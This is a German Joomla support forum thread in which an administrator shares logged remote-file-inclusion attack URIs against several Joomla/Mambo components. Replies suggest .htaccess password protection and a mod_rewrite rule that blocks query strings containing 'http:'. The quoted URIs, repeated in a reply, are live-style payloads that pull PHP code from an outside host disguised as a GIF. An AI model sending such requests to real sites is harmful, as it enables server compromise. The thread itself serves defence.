+ Antworten
Ergebnis 1 bis 4 von 4

Thema: Vermehrte Angriffe

  1. #1
    Neu an Board Avatar von Neo23x0
    Registriert seit
    24.12.2005
    Beiträge
    36
    Bedankte sich
    0
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard Vermehrte Angriffe

    Stelle heute wieder einmal starke Angriffe von unterschiedlichsten IPs fest. Habe mein Mod-Security und mein Fail2Ban im Griff und gebe mal die angefragten URIs weiter, falls der ein oder andere dabei eines seiner Module erkennt und keinen Filter benutzt.

    Code:
    /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://saintmarkslutheran.com/old/joomla/images/avataras/469593392871067.gif?
    /modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://saintmarkslutheran.com/old/joomla/images/avataras/811474392871066.gif?
    /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://saintmarkslutheran.com/old/joomla/images/avataras/680067392871069.gif?
    /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://saintmarkslutheran.com/old/joomla/images/avataras/794283392871065.gif?
    /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://saintmarkslutheran.com/old/joomla/images/avataras/803546392871064.gif?
    Das gute daran ist, dass der Angriff ins Leere läuft, weil es den Avatar nicht mehr gibt. Ganz sicher steckt da auch kein GIF dahinter sondern etwas PHP Code. Um zu testen, ob eigene Installationen anfällig sind, kann man mal ein eigenes PHP-Skript schreiben mit nem phpinfo() und versuchen das so einzuschleusen.


    Greets,

    Neo

  2. #2
    Gute Seele des Boards Avatar von keraM
    Registriert seit
    12.03.2006
    Ort
    Dresden
    Beiträge
    10.592
    Bedankte sich
    152
    Erhielt 2.558 Danksagungen
    in 2.360 Beiträgen

    Standard

    Das Verzeichnis /administrator kann man per .htaccess mit einem Passwortschutz belegen (http://www.scar4u.de/scripts/scarhtaccess/index.html). Damit prallen diese Angriffe dort wirkungslos ab.

    Angriffe auf Erweiterungen sind auch nur dann erfolgreich, wenn dort eine Lücke ausgenutzt werden kann. Ist die erhoffte Lücke nicht vorhanden, laufen auch diese Angriffe ins Leere. Mit einer modifizierten .htaccess kann man die allerdings auch zum großen Teil vorher ausfiltern.
    Gruß keraM
    Joomla-FAQ: --> Klick!
    Support per PN: --> Klick!

  3. #3
    Neu an Board
    Registriert seit
    31.12.2007
    Beiträge
    38
    Bedankte sich
    0
    Erhielt 9 Danksagungen
    in 8 Beiträgen

    Blinzeln

    Zitat Zitat von Neo23x0 Beitrag anzeigen
    Stelle heute wieder einmal starke Angriffe von unterschiedlichsten IPs fest. Habe mein Mod-Security und mein Fail2Ban im Griff und gebe mal die angefragten URIs weiter, falls der ein oder andere dabei eines seiner Module erkennt und keinen Filter benutzt.

    Code:
    /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://saintmarkslutheran.com/old/joomla/images/avataras/469593392871067.gif?
    /modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://saintmarkslutheran.com/old/joomla/images/avataras/811474392871066.gif?
    /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://saintmarkslutheran.com/old/joomla/images/avataras/680067392871069.gif?
    /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://saintmarkslutheran.com/old/joomla/images/avataras/794283392871065.gif?
    /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://saintmarkslutheran.com/old/joomla/images/avataras/803546392871064.gif?
    Das gute daran ist, dass der Angriff ins Leere läuft, weil es den Avatar nicht mehr gibt. Ganz sicher steckt da auch kein GIF dahinter sondern etwas PHP Code. Um zu testen, ob eigene Installationen anfällig sind, kann man mal ein eigenes PHP-Skript schreiben mit nem phpinfo() und versuchen das so einzuschleusen.


    Greets,

    Neo
    Nun, ein
    Code:
    RewriteEngine On
    RewriteCond %{QUERY_STRING} http\%3A\%2F\%2F [OR]
    RewriteCond %{QUERY_STRING} http\:
    RewriteRule ^(.*)$ index.php [F,L]
    Hilft hier schon viel.

    Ich gehe teilweise noch weiter und lasse sich Angreifer gleich beim BKA vorstellen... (Hier ein Beispiel IP-Bereich!)
    Code:
    RewriteCond %{REMOTE_ADDR} ^125.62.
    RewriteRule .* http://www.bka.de [R=301,L]

  4. #4
    Gute Seele des Boards Avatar von keraM
    Registriert seit
    12.03.2006
    Ort
    Dresden
    Beiträge
    10.592
    Bedankte sich
    152
    Erhielt 2.558 Danksagungen
    in 2.360 Beiträgen

    Standard

    Ich gehe teilweise noch weiter und lasse sich Angreifer gleich beim BKA vorstellen...
    Ob das klug ist, wage ich zu bezweifeln.
    Gruß keraM
    Joomla-FAQ: --> Klick!
    Support per PN: --> Klick!

+ Antworten

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein